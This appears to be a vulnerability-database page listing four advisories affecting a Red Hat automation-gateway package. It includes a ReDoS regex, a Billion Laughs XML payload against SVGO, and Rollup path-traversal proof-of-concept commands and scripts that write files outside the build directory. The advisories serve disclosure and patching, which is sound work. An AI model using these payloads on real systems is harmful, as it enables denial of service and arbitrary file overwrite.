Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:rpm/redhat/automation-gateway@2.5.20260422-2?arch=el8ap
purl pkg:rpm/redhat/automation-gateway@2.5.20260422-2?arch=el8ap
Next non-vulnerable version None.
Latest non-vulnerable version None.
Risk 4.1
Vulnerabilities affecting this package (4)
Vulnerability Summary Fixed by
VCID-1znw-5dwm-7ydy
Aliases:
CVE-2025-69873
GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\"^(a|a)*$\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation. There are no reported fixed by versions.
VCID-8p3a-fmau-17ad
Aliases:
CVE-2026-6266
aap-controller: aap-gateway: Account hijacking and unauthorized access via unverified email linking There are no reported fixed by versions.
VCID-d6bq-bvvm-33f4
Aliases:
CVE-2026-29074
GHSA-xpqw-6gx7-v673
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs) ### Summary SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with `JavaScript heap out of memory`. ### Details The upstream XML parser ([sax](https://www.npmjs.com/package/sax)) doesn't interpret custom XML entities by default. We pattern matched custom XML entities from the `DOCTYPE`, inserting them into `parser.ENTITIES`, and enabled `unparsedEntities`. This gives us the desired behavior of supporting SVGs with entities declared in the `DOCTYPE`. However, entities can reference other entities, which can enable small SVGs to explode exponentially when we try to parse them. #### Proof of Concept ```js import { optimize } from 'svgo'; /** Presume that this string was obtained in some other way, such as network. */ const original = ` <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> `; optimize(original); ``` ### Impact If SVGO is run on untrusted input (i.e., user uploaded to server-side application), then the untrusted SVG can effectively stall or crash the application with an SVG < 1 KB in size. It's unlikely to impact users who just use SVGO locally on their own SVGs or in build pipelines. ### Patches SVGO has patched v4.0.1, v3.3.3, and v2.8.1! However, it's strongly recommended to upgrade to v4 regardless, as previous versions are not officially supported anymore. ### Workarounds #### == 4.0.0 For v4, users do not specifically have to upgrade SVGO, though it is recommended to do so. A package manager can be used to upgrade sax recursively: For example: ```sh yarn up -R sax ``` New options were introduced upstream which makes the way SVGO parses SVGs safe by default. #### >= 2.1.0, <= 3.3.2 Users of v3 and v2 will have to take manual action. If users can't upgrade, they may be able to work around this as long as the project doesn't require support for custom XML entities, though it's not a simple flag. Parse the DOCTYPE directly and check for the presence of custom entities. If entities are present, throw/escape before passing them to SVGO. ```diff + import SAX from 'sax'; import { optimize } from 'svgo'; - const original =` + let original = ` <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> `; + const parser = SAX.parser(); + /** @param {string} doctype */ + parser.ondoctype = (doctype) => { + original = original.replace(doctype, ''); + } + parser.write(original); optimize(original); ``` ### Resources * [Wikipedia: Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) There are no reported fixed by versions.
VCID-kmtj-812h-zudn
Aliases:
CVE-2026-27606
GHSA-mw96-cpmx-2vgc
Rollup 4 has Arbitrary File Write via Path Traversal ### Summary The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. ### Details The vulnerability is caused by the combination of two flawed components in the Rollup core: 1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\`). ```typescript // src/utils/sanitizeFileName.ts (Line 3) const INVALID_CHAR_REGEX = /[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g; ``` This allows path traversal sequences like `../../` to pass through the sanitizer unmodified. 2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the "sanitized" filename. ```typescript // src/rollup/rollup.ts (Line 317) const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName); ``` Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write. ### PoC A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file. **Scenario: CLI Named Input Exploit** 1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`). 2. Execute Rollup with a specifically crafted named input where the key contains traversal characters: ```bash rollup --input "a/../../pwned.js=main.js" --dir dist ``` 3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder. **Reproduction Files provided :** * `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug. * `exploit.py`: Automated script to run the PoC and verify the file escape. vuln_app.js ```js const path = require('path'); const fs = require('fs'); /** * REPLICATED ROLLUP VULNERABILITY * * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts) * 2. Unsafe Path Resolution (from src/rollup/rollup.ts) */ function sanitize(name) { // The vulnerability: Rollup's regex fails to strip dots and slashes, // allowing path traversal sequences like '../' return name.replace(/[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g, '_'); } async function build(userSuppliedName) { const outputDir = path.join(__dirname, 'dist'); const fileName = sanitize(userSuppliedName); // Vulnerability: path.resolve() follows traversal sequences in the filename const outputPath = path.resolve(outputDir, fileName); console.log(`[*] Target write path: ${outputPath}`); if (!fs.existsSync(path.dirname(outputPath))) { fs.mkdirSync(path.dirname(outputPath), { recursive: true }); } fs.writeFileSync(outputPath, 'console.log("System Compromised!");'); console.log(`[+] File written successfully.`); } build(process.argv[2] || 'bundle.js'); ``` exploit.py ```py import subprocess from pathlib import Path def run_poc(): # Target a file outside the 'dist' folder poc_dir = Path(__file__).parent malicious_filename = "../pwned_by_rollup.js" target_path = poc_dir / "pwned_by_rollup.js" print(f"=== Rollup Path Traversal PoC ===") print(f"[*] Malicious Filename: {malicious_filename}") # Trigger the vulnerable app subprocess.run(["node", "poc/vuln_app.js", malicious_filename]) if target_path.exists(): print(f"[SUCCESS] File escaped 'dist' folder!") print(f"[SUCCESS] Created: {target_path}") # target_path.unlink() # Cleanup else: print("[FAILED] Exploit did not work.") if __name__ == "__main__": run_poc() ``` ## POC ```rollup --input "bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js" --dir dist``` <img width="1918" height="1111" alt="image" src="https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4" /> ### Impact This is a **High** level of severity vulnerability. * **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges. * **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase. * **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise. There are no reported fixed by versions.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-05-06T08:44:55.019299+00:00 RedHat Importer Affected by VCID-1znw-5dwm-7ydy https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-69873.json 38.6.0
2026-05-06T08:44:54.591317+00:00 RedHat Importer Affected by VCID-kmtj-812h-zudn https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27606.json 38.6.0
2026-05-06T08:44:54.348778+00:00 RedHat Importer Affected by VCID-d6bq-bvvm-33f4 https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-29074.json 38.6.0
2026-05-06T08:44:36.303409+00:00 RedHat Importer Affected by VCID-8p3a-fmau-17ad https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-6266.json 38.6.0